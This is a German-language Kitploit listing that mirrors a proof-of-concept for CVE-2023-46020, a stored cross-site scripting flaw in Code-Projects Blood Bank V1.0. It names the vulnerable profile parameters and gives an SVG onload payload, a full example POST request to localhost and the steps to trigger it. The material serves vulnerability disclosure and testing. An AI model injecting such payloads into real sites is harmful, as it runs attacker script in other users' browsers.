Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability — Proof-of-Concept-Exploit für eine gespeicherte Cross-Site-Scripting-Schwachstelle (XSS) in Code-Projects Blood Bank V1.0 über nicht bereinigte Profilparameter, mit Payload-Injektion und Trigger-Demonstration. | Kitploit
Tools/GitHubGitHub/ersinerenler/cve-2023-46020-code-projects-blood-bank-1.0-stored-cross-site-scripting-vulnerability
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubersinerenler/cve-2023-46020-code-projects-blood-bank-1.0-stored-cross-site-scripting-vulnerability

CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability

Proof-of-Concept-Exploit für eine gespeicherte Cross-Site-Scripting-Schwachstelle (XSS) in Code-Projects Blood Bank V1.0 über nicht bereinigte Profilparameter, mit Payload-Injektion und Trigger-Demonstration.

Repository anzeigen
39vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability

  • Exploit-Autor: ersinerenler

Homepage des Anbieters

  • https://code-projects.org/blood-bank-in-php-with-source-code

Software-Link

  • https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip

Übersicht

  • Code-Projects Blood Bank V1.0 ist anfällig für eine kritische Sicherheitsschwachstelle, die gespeichertes Cross-Site-Scripting (XSS) über mehrere Parameter (rename, remail, rphone und rcity) in der Datei /updateprofile.php betrifft. Die Anwendung bereinigt benutzergelieferte Daten nicht ausreichend, sodass Angreifer bösartige Skripte in die Anwendung einschleusen können. Dies könnte zur Ausführung von beliebigem Skriptcode in den Browsern ahnungsloser Benutzer führen und möglicherweise deren Sicherheit und Privatsphäre im Kontext der betroffenen Website gefährden.

Details zur Schwachstelle

  • CVE-ID: CVE-2023-46020
  • Betroffene Version: Blood Bank V1.0
  • Verwundbare Datei: updateprofile.php
  • Parameter: rename, remail, rphone, rcity
  • Angriffsart: lokal

Referenzen:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46020
  • https://nvd.nist.gov/vuln/detail/CVE-2023-46020

Beschreibung

  • Die Parameter rename, remail, rphone und rcity in der Datei /file/updateprofile.php von Code-Projects Blood Bank V1.0 sind anfällig für gespeichertes Cross-Site-Scripting (XSS). Diese Schwachstelle entsteht durch unzureichende Validierung und Bereinigung benutzergelieferter Daten. Ein Angreifer kann diese Schwäche ausnutzen, indem er bösartige Skripte in diese Parameter einschleust, die, sobald sie auf dem Server gespeichert sind, ausgeführt werden können, wenn andere Benutzer das Profil des betroffenen Benutzers ansehen.

Proof of Concept (PoC) :

  • Fangen Sie die POST-Anfrage an updateprofile.php über Burp Suite ab
  • Injizieren Sie den Payload in die verwundbaren Parameter
  • Payload: "><svg/onload=alert(document.domain)>
  • Beispielanfrage für den Parameter rname
POST /bloodbank/file/updateprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/rprofile.php?id=1
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
  • Gehen Sie zur Profilseite und lösen Sie das XSS aus
Bild
Tool herunterladen